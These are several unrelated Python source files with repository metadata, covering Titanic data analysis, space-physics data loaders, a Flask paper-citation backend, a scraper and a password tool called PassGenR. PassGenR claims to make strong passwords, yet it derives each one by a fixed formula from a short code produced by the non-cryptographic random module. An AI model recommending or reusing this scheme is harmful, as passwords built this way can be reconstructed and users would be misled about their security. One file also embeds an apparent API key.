not_survived_pclass2_age = train_df.loc[np.where((train_df['Pclass'] == 2) & (train_df['Survived'] == 0))]['Age']
not_survived_pclass3_age = train_df.loc[np.where((train_df['Pclass'] == 3) & (train_df['Survived'] == 0))]['Age']
survived_pclass1_age = train_df.loc[np.where((train_df['Pclass'] == 1) & (train_df['Survived'] == 1))]['Age']
survived_pclass2_age = train_df.loc[np.where((train_df['Pclass'] == 2) & (train_df['Survived'] == 1))]['Age']
survived_pclass3_age = train_df.loc[np.where((train_df['Pclass'] == 3) & (train_df['Survived'] == 1))]['Age']
# plot figures
fig, axs = plt.subplots(3,2,figsize=(12,12))
fig.suptitle('Distributions of Age by Pclass and Survived')
axs[0,0].hist(not_survived_pclass1_age, bins=21, color='tomato')
axs[0,0].set_title('Pclass = 1 | Survived = 0')
axs[1,0].hist(not_survived_pclass2_age, bins=21, color='tomato')
axs[1,0].set_title('Pclass = 2 | Survived = 0')
axs[2,0].hist(not_survived_pclass3_age, bins=21, color='tomato')
axs[2,0].set_title('Pclass = 3 | Survived = 0')
axs[0,1].hist(survived_pclass1_age, bins=21, color='orange')
axs[0,1].set_title('Pclass = 1 | Survived = 1')
axs[1,1].hist(survived_pclass2_age, bins=21, color='orange')
axs[1,1].set_title('Pclass = 2 | Survived = 1')
axs[2,1].hist(survived_pclass3_age, bins=21, color='orange')
axs[2,1].set_title('Pclass = 3 | Survived = 1')
plt.show()
plt.close()
# Count number of passengers by pclass
train_df.groupby(['Pclass'])['PassengerId'].count()
train_df.groupby(['Pclass', 'Survived'])['PassengerId'].count()
## Q13
train_df_q13 = train_df.groupby(['Embarked', 'Survived', 'Sex'])['Fare'].mean()
# plot figures
fig, axs = plt.subplots(3,2,figsize=(11,11))
fig.suptitle('Distributions of Average Fare by Embarked, Survived and Sex')
axs[0,0].bar(['female', 'male'],train_df_q13[8:10].values, color='tomato')
axs[0,0].set_title('Embarked = S | Survived = 0')
axs[0,0].set_ylabel('Average Fare')
axs[1,0].bar(['female', 'male'],train_df_q13[:2].values, color='tomato')
axs[1,0].set_title('Embarked = C | Survived = 0')
axs[1,0].set_ylabel('Average Fare')
axs[2,0].bar(['female', 'male'],train_df_q13[4:6].values, color='tomato')
axs[2,0].set_title('Embarked = Q | Survived = 0')
axs[2,0].set_ylabel('Average Fare')
axs[0,1].bar(['female', 'male'],train_df_q13[10:12].values, color='orange')
axs[0,1].set_title('Embarked = S | Survived = 1')
axs[1,1].bar(['female', 'male'],train_df_q13[2:4].values, color='orange')
axs[1,1].set_title('Embarked = C | Survived = 1')
axs[2,1].bar(['female', 'male'],train_df_q13[6:8].values, color='orange')
axs[2,1].set_title('Embarked = Q | Survived = 1')
plt.show()
plt.close()
train_df.groupby(['Embarked', 'Survived', 'Sex'])['Fare'].mean()
train_df.groupby(['Embarked', 'Survived', 'Sex'])['PassengerId'].count()
## Q14
train_df.Ticket.duplicated().value_counts()
## Q15
train_df.Cabin.describe()
test_df.Cabin.describe()
## Q16
train_df['Gender'] = np.where(train_df['Sex']== 'male', 0, 1)
train_df.head(10)
## Q17
# calculate mean and standard deviation
mean = train_df['Age'].mean()
std = train_df['Age'].std()
print('Mean', mean)
print('Standard Deviation', std)
print('\n')
print('Estimated Missing Values in the Age feature.')
# we can randomly pick a value between standard deviation and Mean from Uniform distribution
# to impute missing values
def missing_value_imputation(value):
if np.isnan(value) == True:
value = random.uniform(std, mean)
else:
value = value
return value
# call the above function
train_df['Age'] = train_df['Age'].apply(missing_value_imputation)
## Q18
# find the most frequent value
most_frequent_value = train_df['Embarked'].value_counts().idxmax()
print('The most frequent value in Embarked:', most_frequent_value)
print('\n')
print('The training set with missing Embarked records')
is_na = train_df["Embarked"].isna()
print(train_df[is_na]["Embarked"])
# fill the missing records by the most frequent value
train_df["Embarked"] = train_df["Embarked"].fillna(most_frequent_value)
print('\n')
print('The training set without missing Embarked records')
print(train_df[is_na]["Embarked"])
## Q19
# find the most frequent value
mode = test_df['Fare'].mode()
print('The most frequent value in Fare:', mode)
print('\n')
print('The test set with missing Fare records')
is_na = test_df["Fare"].isna()
print(test_df[is_na]["Fare"])
# fill the missing records by the most frequent value
test_df["Fare"] = test_df["Fare"].fillna(mode[0])
print('\n')
print('The test set without missing Fare records')
print(test_df[is_na]["Fare"])
## Q20
train_df['ordinal_fare'] = np.where(train_df['Fare'] <= 7.91, 0,
(np.where(train_df['Fare'] <= 14.454, 1,
(np.where(train_df['Fare'] <= 31.0, 2, 3)))))
# print first 10 rows
# print(train_df.head(10))
train_df[['PassengerId','Fare','ordinal_fare']].head(10)
# reproduce the table in the question
Avg = pd.DataFrame(train_df.groupby(['ordinal_fare'])['Survived'].mean())
Avg = pd.DataFrame(Avg)
Avg
#### The end ####
``` |
{
"source": "Jibanul/math_in_python",
"score": 4
} |
#### File: math_in_python/taylor_approximation_python/cos_function.py
```python
import time
import pylab as pl
from IPython import display
import numpy as np
def taylor_approx(n):
x = np.linspace(np.pi*(-3), np.pi*(3),100) # values of x from -3*pi to 3*pi
approx = np.zeros(len(x), dtype=np.dtype('O'))
for i in range(n):
approx += ((-1)**i) * (x**(2*i)/np.math.factorial(2*i)) # taylor series of cos(x)
pl.plot(x, np.cos(x))
pl.plot(x, approx)
pl.ylim(-1.7,1.7)
pl.legend(('cos() function', 'Taylor Approximation'), loc = 'upper right')
pl.text(x = -8, y = 1.25, s = "n = " + str(i), fontsize=15)
display.clear_output(wait=True)
display.display(pl.gcf())
pl.clf()
time.sleep(1.0) # pause 1 sec before ploting the next curve
# call the function
taylor_approx(n = 13)
``` |
{
"source": "jibarnum/pyspedas",
"score": 2
} |
#### File: pyspedas/maven/__init__.py
```python
from .maven_load import load_data
def maven_load(instruments=None,
kp_instruments=None,
start_date='2014-01-01',
end_date='2020-01-01',
update_prefs=False,
only_update_prefs=False,
local_dir=None,
list_files=False,
new_files=False,
exclude_orbit_file=False,
download_only=False,
varformat=None,
prefix='',
suffix='',
get_support_data=False,
public=True):
"""
Main function for downloading MAVEN data and loading it into tplot variables (if applicable).
Parameters:
instruments: str/list of str
Instruments from which you want to download data. This is where you can indicate that you want to
download KP data (via 'kp-insitu' for KP in situ data or 'kp-iuvs' for KP iuvs data).
kp_instruments: str/list of str
Instruments from which you want to grab KP in situ data. Only needed if you're downloading KP in situ data,
and is optional (if you don't specify, and you chose to download KP in situ data,
KP in situ data will be downloaded for all instruments with in situ data).
list_files: bool (True/False0
If true, lists the files instead of downloading them.
new_files: bool (True/False)
Checks downloaded files and only downloads those that haven't already been downloaded.
start_date: str
String that is the start date for downloading data (YYYY-MM-DD)
end_date: str
String that is the end date for downloading data (YYYY-MM-DD)
update_prefs: bool (True/False)
If true, updates where you want to store data locally
only_update_prefs: bool (True/False)
If true, *only* updates where to store dat alocally, doesn't download files.
exclude_orbit_file: bool (True/False)
If true, won't download the latest orbit tables.
local_dir: str
If indicated, specifies where to download files for a specific implementation of this function.
download_only: bool (True/False)
If True then files are downloaded only,
if False then CDF files are also loaded into pytplot using cdf_to_tplot.
varformat : str
The file variable formats to load into tplot. Wildcard character
"*" is accepted. By default, all variables are loaded in.
prefix: str
The tplot variable names will be given this prefix.
By default, no prefix is added.
suffix: str
The tplot variable names will be given this suffix.
By default, no suffix is added.
get_support_data: bool
Data with an attribute "VAR_TYPE" with a value of "support_data"
will be loaded into tplot. By default, only loads in data with a
"VAR_TYPE" attribute of "data".
public: bool
If True, downloads data from the MAVEN public website.
If False, downloads data from the MAVEN private website (will ask for username/password).
"""
tvars = load_data(instruments=instruments, kp_instruments=kp_instruments, start_date=start_date, end_date=end_date,
update_prefs=update_prefs, only_update_prefs=only_update_prefs, local_dir=local_dir,
list_files=list_files, new_files=new_files, exclude_orbit_file=exclude_orbit_file,
download_only=download_only, varformat=varformat, prefix=prefix, suffix=suffix,
get_support_data=get_support_data, public=public)
return tvars
```
#### File: pyspedas/maven/kp_to_tplot.py
```python
import pytplot
def kp_to_tplot(insitu):
"""Creates tplot variables from the insitu variable
"""
# Keep track of stored KP variables
stored_variables = []
# initialize each instrument
inst_list = ["EUV", "LPW", "STATIC", "SWEA", "SWIA", "MAG", "SEP", "NGIMS"]
for instrument in inst_list:
# for each observation for each instrument
if insitu[instrument] is not None:
for obs in insitu[instrument]:
# create variable name
obs_specific = "mvn_kp::" + instrument.lower() + "::" + obs.lower()
# if NaN or string, continue
if insitu[instrument][obs].isnull().all() or insitu[instrument][obs].dtype == 'O':
continue
# store data in tplot variable
pytplot.store_data(obs_specific, data={'x': insitu['Time'], 'y': insitu[instrument][obs]})
if obs_specific not in stored_variables:
stored_variables.append(obs_specific)
return stored_variables
```
#### File: mms/eis/mms_eis_omni.py
```python
import numpy as np
from pytplot import get_data, store_data, options
from ...utilities.tnames import tnames
def mms_eis_omni(probe, species='proton', datatype='extof', suffix='', data_units='flux', data_rate='srvy'):
probe = str(probe)
species_str = datatype+'_'+species
if data_rate == 'brst':
prefix = 'mms'+probe+'_epd_eis_brst_'
else: prefix = 'mms'+probe+'_epd_eis_'
telescopes = tnames(pattern=prefix + species_str + '_*' + data_units + '_t?'+suffix)
if len(telescopes) > 0:
time, data, energies = get_data(telescopes[0])
flux_omni = np.zeros((len(time), len(energies)))
for t in telescopes:
time, data, energies = get_data(t)
flux_omni = flux_omni + data
store_data(prefix+species_str+'_'+data_units+'_omni'+suffix, data={'x': time, 'y': flux_omni/6., 'v': energies})
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'spec', 1)
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'ylog', 1)
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'zlog', 1)
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'yrange', [14, 45])
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'Colormap', 'jet')
print(prefix+species_str+'_'+data_units+'_omni'+suffix)
```
#### File: pyspedas/pyspedas/prefs.py
```python
import os
def get_prefs_filename():
dir_path = os.path.abspath(os.path.dirname(__file__))
fname = os.path.join(dir_path, 'spd_prefs_txt.py')
print(fname)
return fname
def get_spedas_prefs():
"""Get all the spedas preferences and return a directory"""
fname = get_prefs_filename()
print("Preferences file: " + fname)
"""Read preferences"""
with open(fname, 'r') as f:
content = f.readlines()
content = [x.strip() for x in content]
"""Fill dictionary"""
ans_dict = {}
for line in content:
if len(line) > 2 and line[0] != "#":
terms = line.split('=')
terms = [x.strip() for x in terms]
if len(terms) == 2:
if terms[0] != '' and terms[1] != '':
ans_dict[terms[0].replace("'", "")] = terms[1].replace("'",
"")
f.closed
return ans_dict
def set_spedas_prefs(var_name, var_value):
"""Get all the spedas preferences and return a directory"""
found = 0
if var_name == '' or var_value == '':
return found
fname = get_prefs_filename()
print("Preferences file: " + fname)
"""Read preferences"""
with open(fname, 'r') as f:
content = f.readlines()
content = [x.strip() for x in content]
"""Make change"""
new_content = ''
for line in content:
new_line = line
if len(line) > 2 and line[0] != "#":
terms = line.split('=')
terms = [x.strip() for x in terms]
if len(terms) == 2:
if terms[0] != '' and terms[1] != '':
if terms[0] == var_name:
new_line = var_name + "='" + var_value + "'"
found = 1
new_line = new_line.replace(os.linesep, '\n').strip()
if new_line != '':
new_content += new_line + '\n'
with open(fname, 'w') as f:
f.write(new_content)
f.closed
return found
``` |
{
"source": "JibbleEinuxCODE/PassGenR",
"score": 4
} |
#### File: JibbleEinuxCODE/PassGenR/setup.py
```python
import string
import random
# logo of this tool just print out ascii art.
print('-------------------------------------------------------------------')
print('██████ █████ ███████ ███████ ██████ ███████ ███ ██ ██████ ')
print('██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ')
print('██████ ███████ ███████ ███████ ██ ███ █████ ██ ██ ██ ██████ ')
print('██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ')
print('██ ██ ██ ███████ ███████ ██████ ███████ ██ ████ ██ ██ ')
print('-------------------------------------------------------------------')
print('----------Hi everyone, Wellcome to password generate tool----------')
print(' This tool create @Jibble Einux ')
print(' follow on github,facebook: @JibbleEinuxCODE ')
# this function make for creating a random authentication Code
# and also create a random password
# thats why you can make a easy password , strong password , semi-strong password and extra-strong password
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
print('\n')
print('----------------------------------------------------')
print('Your authentication code is generated: ' + result_str)
print('----------------------------------------------------')
print('You Can Find Your Password (if Yo forget password) with this Authentication Code.')
passWord = (str(len(result_str)) + str(result_str[:2].lower()) + str(result_str[:1:-2].upper()) + "-" + str(result_str.count(result_str)) + str(result_str[:1].upper()) + "X" + "6" + "_" + "D" + str(
result_str[0::3].lower()) + str(result_str.count(result_str)) + "X" + "f" + str(result_str[:4].lower()) + "+" + str(result_str[4::-1].upper())).strip().replace(" ", "")
print('----------------------------------------------------')
print('Your Password is: ' + passWord)
print('----------------------------------------------------')
# this function make for finding password if you forgotten
# if you want to find your password you just enter your random authentication Code / custom authentication code
# after giving your authentication code this function creating your password and it will be matched your old password
# Because of when 1st time create your password with this authentication code this time will be same
def find_password_string():
print('\n')
result_str = input('Enter You Authentication Code: ')
passWord = (str(len(result_str)) + str(result_str[:2].lower()) + str(result_str[:1:-2].upper()) + "-" + str(result_str.count(result_str)) + str(result_str[:1].upper()) + "X" + "6" + "_" + "D" + str(
result_str[0::3].lower()) + str(result_str.count(result_str)) + "X" + "f" + str(result_str[:4].lower()) + "+" + str(result_str[4::-1].upper())).strip().replace(" ", "")
print('----------------------------------------------------')
print('Your Password is: ' + passWord)
print('----------------------------------------------------')
# this section creating for user can make her own authentication code thats why he can remember her authetication code
# and people can easily find her password thats why make this section
def custom_auth_Code():
print('\n')
result_str = input('Enter You Custom Authentication Code: ')
passWord = (str(len(result_str)) + str(result_str[:2].lower()) + str(result_str[:1:-2].upper()) + "-" + str(result_str.count(result_str)) + str(result_str[:1].upper()) + "X" + "6" + "_" + "D" + str(
result_str[0::3].lower()) + str(result_str.count(result_str)) + "X" + "f" + str(result_str[:4].lower()) + "+" + str(result_str[4::-1].upper())).strip().replace(" ", "")
print('----------------------------------------------------')
print('Your Custom authentication code is: ' + result_str)
print('----------------------------------------------------')
print('You Can Easily Find/Re-create Your Password with this Authentication Code.')
print('----------------------------------------------------')
print('Your Password is: ' + passWord)
print('----------------------------------------------------')
# printing services
# and details
while True:
print('\n')
print('The services of PassGenR tool are:')
print('1.Create a New random password')
print('2.Create a New custom password')
print('3.find your forgotten password')
print('4.Contact me')
print('type 99 for Exit ')
print('Chose your service(1-4)')
serviceChose = int(input('PassGenR >> '))
if serviceChose == 99:
break
# random password session
if serviceChose == 1:
print('There are some password typs:')
print('1.Easy \n2.normal \n3.Strong \n4.Extra-Strong')
print('Enter Your Password type(1-4): ')
passwordType = int(input())
# condition for length of rangom password function parameter
if passwordType == 1:
get_random_string(8)
elif passwordType == 2:
get_random_string(12)
elif passwordType == 3:
get_random_string(16)
else:
get_random_string(20)
# creating custom password session
elif serviceChose == 2:
print('You can make easily your authenticaion code')
custom_auth_Code()
# finding forgotten password session
elif serviceChose == 3:
find_password_string()
# about session for myself
elif serviceChose == 4:
print('\n')
print('Thank You for Using this tools')
print('This tool create by Jibble Einux')
print('Follow me:')
print('----------------------------------------------------')
print("Github: https://github.com/JibbleEinuxCODE ")
print("Facebook: https://facebook.com/JibbleEinuxCODE ")
print('----------------------------------------------------')
else:
continue
# Thanks every one
# Jibble Einux
# www.facebook.com/JibbleEinuxCODE
# Contract me: <EMAIL>
``` |
{
"source": "jibbo/master_thesis",
"score": 2
} |
#### File: evaluations/devartist/DevARTistWorker.py
```python
from os import path
from DeviceWorker import DeviceWorker
from utils.apkdownload.download import ApkDownloader
from utils.shellutils import adb_install, adb_shell, adb_uninstall
class DevARTistWorker(DeviceWorker):
def __init__(self, group=None, target=None, name="DeviceProcess", args=(), kwargs={}, control_channel=None,
queue=None, report_queue=None, device_id=None,
apk_folder='.', artist_package = 'saarland.cispa.artist.artistgui', artist_activity = 'ArtistMainActivity'):
super(DevARTistWorker, self).__init__(group, target, name, args, kwargs, control_channel, queue, report_queue,
device_id, apk_folder, artist_package, artist_activity)
self.downloader = ApkDownloader()
def process(self, task):
# local import to avoid circular dependency
from evaluations.trace_logging.TraceLoggingEvaluator import TraceLoggingEvaluator
app = task.package
seed = self.generate_monkey_seed()
app_path = self.generate_app_path(app)
self.start_task(task)
try:
# download app
self.start_subtask(TraceLoggingEvaluator.SUBTASK_DOWNLOAD_APP)
self.downloader.download_if_not_exist(app, self.apk_folder)
# TODO let the download method directly return whether it worked or not
download_succ = path.exists(app_path)
self.conclude_subtask(download_succ)
if not download_succ:
self.log('App not downloaded. Abort.')
return
# install app for the first time
self.start_subtask(TraceLoggingEvaluator.SUBTASK_INSTALL_APP_1)
(success2, out2) = adb_install(app_path, device=self.device_id)
self.log(out2)
self.conclude_subtask(success2, include_logcat=True)
if not success2:
return
# test uninstrumented app. We are interested in whether apps might be broken already BEFORE we instrument
self.start_subtask(TraceLoggingEvaluator.SUBTASK_TEST_UNINSTRUMENTED)
success3 = self.monkey_test(app, seed)
self.conclude_subtask(success3, include_logcat=True)
if not success3:
return
# clean (re)installation of app
self.start_subtask(TraceLoggingEvaluator.SUBTASK_INSTALL_APP_2)
(success4, out4) = adb_install(app_path, device=self.device_id)
self.log(out4)
self.conclude_subtask(success4, include_logcat=True)
if not success4:
return
# instrument app
self.start_subtask(TraceLoggingEvaluator.SUBTASK_INSTRUMENT)
success5 = self.instrument(app)
self.conclude_subtask(success5, include_logcat=True)
if not success5:
return
# test instrumented app again with the same seed
self.start_subtask(TraceLoggingEvaluator.SUBTASK_TEST_INSTRUMENTED)
success6 = self.monkey_test(app, seed)
self.conclude_subtask(success6, include_logcat=True)
# always cleanup no matter where we finish
finally:
self.cleanup(task)
# best effort cleanup since we do not know what apps and data are still on the device
def cleanup(self, task):
from evaluations.trace_logging.TraceLoggingEvaluator import TraceLoggingEvaluator
self.start_subtask(TraceLoggingEvaluator.SUBTASK_CLEANUP)
app_package = task.package
self.log('Clean up for task ' + app_package)
artist_succ, artist_out = adb_shell('am force-stop ' + self.artist_package, device=self.device_id)
self.log(('un' if not artist_succ else '') + 'successfully stopped ARTistGUI')
self.log(artist_out)
app_succ, app_out = adb_uninstall(app_package, device=self.device_id)
self.log(('un' if not app_succ else '') + 'successfully deinstalled ' + app_package + ': ')
self.log(app_out)
# delete all result files
del_succ, del_out = adb_shell('rm ' + self.instrumentation_result_path() + '*', device=self.device_id)
self.log(('un' if not del_succ else '') + 'successfully removed result files: ')
self.log(del_out)
# TODO in order to reliably report whether cleaning up worked,
# we need to find out what needs to be cleaned up and then check if it worked.
# Either we remember it during the processing or simply probe whether an app is installed or a file is present
self.conclude_subtask(True, include_logcat=True)
``` |
{
"source": "Jibbow/research-paper-graph",
"score": 3
} |
#### File: main/controller/family_controller.py
```python
from flask import request
from flask_restplus import Resource
from ..dto.relativeDto import RelativeDto
from ..service.family_service import get_preceding, get_succeeding, get_entire
api = RelativeDto.api
_relative = RelativeDto.relative
@api.route('/preceding/')
class PrecedingFamily(Resource):
"""Handle a preceding paper family."""
@api.response(200, 'The preceding family of the paper has been listed.')
@api.response(404, 'The paper has not been found.')
@api.doc('List the preceding family of the paper.',
params={'paper': 'Paper',
'distance': 'Distance',
'year': 'Year',
'citations': 'Citations'})
@api.marshal_with(_relative)
def get(self):
"""List all preceding relatives of a paper."""
relative = request.args.get('paper')
distance = request.args.get('distance')
year = request.args.get('year')
citations = request.args.get('citations')
return get_preceding(relative, distance, year, citations)
@api.route('/succeeding/')
class SucceedingFamily(Resource):
"""Handle a succeeding paper family."""
@api.response(200, 'The succeeding family of the paper has been listed.')
@api.response(404, 'The paper has not been found.')
@api.doc('List the succeeding family of the paper.',
params={'paper': 'Paper',
'distance': 'Distance',
'year': 'Year',
'citations': 'Citations'})
@api.marshal_with(_relative)
def get(self):
"""List all succeeding relatives of a paper."""
relative = request.args.get('paper')
distance = request.args.get('distance')
year = request.args.get('year')
citations = request.args.get('citations')
return get_succeeding(relative, distance, year, citations)
@api.route('/entire/')
class EntireFamily(Resource):
"""Handle an entire paper family."""
@api.response(200, 'The entire family of the paper has been listed.')
@api.response(404, 'The paper has not been found.')
@api.doc('List the entire family of the paper.',
params={'paper': 'Paper',
'distance': 'Distance',
'year': 'Year',
'citations': 'Citations'})
@api.marshal_with(_relative)
def get(self):
"""List all preceding relatives of a paper."""
relative = request.args.get('paper')
distance = request.args.get('distance')
year = request.args.get('year')
citations = request.args.get('citations')
return get_entire(relative, distance, year, citations)
```
#### File: main/controller/paper_controller.py
```python
from flask_restplus import Resource
from flask import request
from ..dto.paperDto import PaperDto
from ..service.paper_service import post, get_all, get, search, delete_all, delete
api = PaperDto.api
_paper = PaperDto.paper
@api.route('/')
class Papers(Resource):
"""Handle all papers."""
@api.response(200, 'All papers have been listed.')
@api.doc('List all papers.')
@api.marshal_list_with(_paper, envelope='data')
def get(self):
"""List all papers."""
return get_all()
@api.response(201, 'The paper has been created.')
@api.response(409, 'The paper already exists.')
@api.doc('Create a new paper.')
@api.expect(_paper, validate=True)
def post(self):
"""Create a new paper."""
data = request.json
return post(data=data)
@api.response(200, 'All papers have been deleted.')
@api.doc('Delete all papers.')
@api.marshal_list_with(_paper, envelope='data')
def delete(self):
"""Delete all papers."""
return delete_all()
@api.route('/<title>')
class Paper(Resource):
"""Handle one paper."""
@api.response(200, 'The paper has been found.')
@api.response(404, 'The paper has not been found.')
@api.doc('Display the paper with the title you are looking for.')
@api.marshal_with(_paper)
def get(self, title):
"""Display the paper with the title you are looking for."""
paper = get(title)
if not paper:
return api.abort(404)
return paper
@api.response(200, 'The paper has been deleted.')
@api.response(404, 'The paper has not been found.')
@api.doc('Delete the paper with the title you are looking for.')
@api.marshal_with(_paper)
def delete(self, title):
"""Delete the paper with the title you are looking for."""
paper = self.get(title)
delete(title)
return paper
@api.route('/search/<keyword>')
class KeywordPapers(Resource):
"""Handle all papers that contain a keyword."""
@api.response(200, 'All papers that contain the searched keyword have been listed.')
@api.doc('List all papers that contain a searched keyword.')
@api.marshal_list_with(_paper)
def get(self, keyword):
"""List all papers that contain a searched keyword."""
return search(keyword)
```
#### File: app/test/test_config.py
```python
import unittest
from flask import current_app
from flask_testing import TestCase
from app import app
class TestDevelopmentConfig(TestCase):
"""Tests the development configuration"""
def create_app(self):
"""Create an app for development"""
app.config.from_object('app.main.config.DevelopmentConfig')
return app
def test_app_is_development(self):
"""Check if the app is in development"""
self.assertFalse(app.config['SECRET_KEY'] == 'my_precious')
self.assertTrue(app.config['DEBUG'] is True)
self.assertFalse(current_app is None)
uri = 'postgresql://postgres@localhost/research'
self.assertTrue(
app.config['SQLALCHEMY_DATABASE_URI'] == uri
)
class TestTestingConfig(TestCase):
"""Tests the testing configuration"""
def create_app(self):
"""Create an App for test"""
app.config.from_object('app.main.config.TestingConfig')
return app
def test_app_is_testing(self):
"""Check if the app is in test"""
self.assertFalse(app.config['SECRET_KEY'] == 'my_precious')
self.assertTrue(app.config['DEBUG'])
uri = 'postgresql://postgres@localhost/research'
self.assertTrue(
app.config['SQLALCHEMY_DATABASE_URI'] == uri
)
class TestProductionConfig(TestCase):
"""Tests the production configuration"""
def create_app(self):
"""Create an app for production"""
app.config.from_object('app.main.config.ProductionConfig')
return app
def test_app_is_production(self):
"""Check if the app is in production"""
self.assertTrue(app.config['DEBUG'] is False)
if __name__ == '__main__':
unittest.main()
```
#### File: migrations/versions/9d48ba00567c_.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9d48ba00567c'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('author',
sa.Column('id', sa.String(length=42), nullable=False),
sa.Column('name', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('paper',
sa.Column('id', sa.String(length=42), nullable=False),
sa.Column('title', sa.String(length=255), nullable=False),
sa.Column('year', sa.Integer(), nullable=True),
sa.Column('abstract', sa.Text(), nullable=False),
sa.Column('citations', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('reference',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('from_paper', sa.String(length=42), nullable=True),
sa.Column('to_paper', sa.String(length=42), nullable=True),
sa.Column('isInfluential', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('write',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('paper', sa.String(length=42), nullable=True),
sa.Column('author', sa.String(length=42), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('write')
op.drop_table('reference')
op.drop_table('paper')
op.drop_table('author')
# ### end Alembic commands ###
```
#### File: backend/scraper/__init__.py
```python
import semanticscholar as ss
import requests
def scrape(): # pylint:disable=too-many-locals
"""Scrape research papers from the Semantic Scholar API"""
# Determine the ids of all relevant research papers.
papers = get_all_papers()
for paperId in papers:
# Get all relevant information for the paper: id, title, abstract, year
paper = ss.paper(paperId)
paperTitle = paper['title']
paperAbstract = paper['abstract']
paperYear = paper['year']
citations = paper['citations']
paperCitations = len(citations)
# Put the given paper into the database.
post_paper(paperId, paperTitle, paperAbstract, paperYear, paperCitations)
# Get all relevant information for the author: id, name
authors = paper['authors']
for author in authors:
authorId = author['authorId']
authorName = author['name']
# Put the given author and writing relation into the database.
post_author(authorId, authorName)
post_write(paperId, authorId)
# Get all references.
# A reference is a paper that the current paper cites/uses.
references = paper['references']
for reference in references:
referenceId = reference['paperId']
referenceIsInfluential = reference['isInfluential']
post_reference(paperId, referenceId, referenceIsInfluential)
# Get all citations.
# A citation is a paper that cites/uses the given paper.
for citation in citations:
citationId = citation['paperId']
citationIsInfluential = citation['isInfluential']
post_reference(citationId, paperId, citationIsInfluential)
def get_all_papers():
"""Determine the ids of all relevant research papers."""
neumann = 143993045
valenzuela = 143990000
li = 144000000
grant = 144100000
kemper = 144122431
authorIds = [neumann, valenzuela, li, grant, kemper]
paperIds = []
for authorId in authorIds:
author = ss.author(authorId)
papers = []
if author != {}:
papers = author['papers']
for paper in papers:
paperId = paper['paperId']
paperIds.append(paperId)
return paperIds
def post_paper(paper_id, paper_title, paper_abstract, paper_year, paper_citations):
"""Put the given paper into the database."""
data = {'id':paper_id,
'title':paper_title,
'abstract':paper_abstract,
'year':paper_year,
'citations':paper_citations
}
r = requests.post(url='http://127.0.0.1:5000/paper/', json=data)
print(r.status_code)
def post_author(author_id, author_name):
"""Post the given author into the database."""
data = {'id':author_id,
'name':author_name,
}
r = requests.post(url='http://127.0.0.1:5000/author/', json=data)
print(r.status_code)
def post_write(paper, author):
"""Post the given writing relation into the database."""
data = {'paper':paper,
'author':author,
}
r = requests.post(url='http://127.0.0.1:5000/write/', json=data)
print(r.status_code)
def post_reference(source, sink, isInfluential):
"""Post the given reference into the database."""
data = {'from_paper':source,
'to_paper':sink,
'is_influential': isInfluential,
}
r = requests.post(url='http://127.0.0.1:5000/reference/', json=data)
print(r.status_code)
scrape()
``` |
{
"source": "jibby0/service-auto-analyzer",
"score": 2
} |
#### File: commons/triggering_training/retraining_defect_type_triggering.py
```python
import logging
from commons.object_saving.object_saver import ObjectSaver
from commons.triggering_training import abstract_triggering_training
logger = logging.getLogger("analyzerApp.retraining_defect_type_triggering")
class RetrainingDefectTypeTriggering(abstract_triggering_training.AbstractTrainingTrigger):
def __init__(self, app_config, start_number=100, accumulated_difference=100):
self.object_saver = ObjectSaver(app_config)
self.start_number = start_number
self.accumulated_difference = accumulated_difference
def remove_triggering_info(self, train_info):
self.object_saver.remove_project_objects(
train_info["project_id"], ["defect_type_trigger_info"])
def get_triggering_info(self, train_info):
return self.object_saver.get_project_object(
train_info["project_id"], "defect_type_trigger_info", using_json=True)
def save_triggering_info(self, trigger_info, train_info):
self.object_saver.put_project_object(
trigger_info, train_info["project_id"],
"defect_type_trigger_info", using_json=True)
def clean_defect_type_triggering_info(self, train_info, num_logs_with_defect_types):
trigger_info = self.get_triggering_info(train_info)
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types"] = num_logs_with_defect_types
self.save_triggering_info(trigger_info, train_info)
def should_model_training_be_triggered(self, train_info):
trigger_info = self.get_triggering_info(train_info)
if "num_logs_with_defect_types" not in trigger_info:
trigger_info["num_logs_with_defect_types"] = 0
trigger_info["num_logs_with_defect_types"] += train_info["num_logs_with_defect_types"]
if "num_logs_with_defect_types_since_training" not in trigger_info:
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types_since_training"] += train_info["num_logs_with_defect_types"]
self.save_triggering_info(trigger_info, train_info)
return trigger_info["num_logs_with_defect_types"] >= self.start_number\
and trigger_info["num_logs_with_defect_types_since_training"] >= self.accumulated_difference
``` |
{
"source": "JibbyJames/coursera-data-scraper",
"score": 3
} |
#### File: JibbyJames/coursera-data-scraper/main.py
```python
import json
import time
import urllib.request
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
def expand_list(df, list_column, new_column):
lens_of_lists = df[list_column].apply(len)
origin_rows = range(df.shape[0])
destination_rows = np.repeat(origin_rows, lens_of_lists)
non_list_cols = (
[idx for idx, col in enumerate(df.columns)
if col != list_column]
)
expanded_df = df.iloc[destination_rows, non_list_cols].copy()
expanded_df[new_column] = (
[item for items in df[list_column] for item in items]
)
expanded_df.reset_index(inplace=True, drop=True)
return expanded_df
run_locally = True
wait_length = 0.5
algolia_url = 'https://lua9b20g37-dsn.algolia.net/1/indexes/test_products?x-algolia-application-id=LUA9B20G37&x-algolia-api-key=dcc55281ffd7ba6f24c3a9b18288499b&hitsPerPage=1000&page='
